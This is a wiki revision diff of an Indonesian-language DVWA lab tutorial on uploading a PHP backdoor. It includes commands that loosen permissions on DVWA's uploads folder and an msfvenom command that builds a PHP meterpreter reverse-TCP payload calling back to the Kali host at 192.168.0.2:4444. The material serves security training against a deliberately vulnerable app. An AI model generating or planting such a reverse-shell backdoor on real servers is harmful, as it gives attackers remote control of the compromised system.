Difference between revisions of "DVWA: Upload PHP Backdoor"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 22: | Line 22: | ||
mkdir -p /root/backdoor | mkdir -p /root/backdoor | ||
cd /root/backdoor | cd /root/backdoor | ||
| − | + | msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php | |
ls -l PHONE_HOME.php | ls -l PHONE_HOME.php | ||
Revision as of 09:30, 27 May 2017
sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html
Di Server DVWA
Ubah ijin folder uploads
sudo su chown www-data.www-data /var/www/html/DVWA-1.9/hackable/uploads/ chmod 775 /var/www/html/DVWA-1.9/hackable/uploads/ ls -ld /var/www/html/DVWA-1.9/hackable/uploads/
Di Kali Linux
Cek ip address
ifconfig
Misalnya IP address kali linux adalah 192.168.0.2
Buat PHP msfpayload
mkdir -p /root/backdoor cd /root/backdoor msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php ls -l PHONE_HOME.php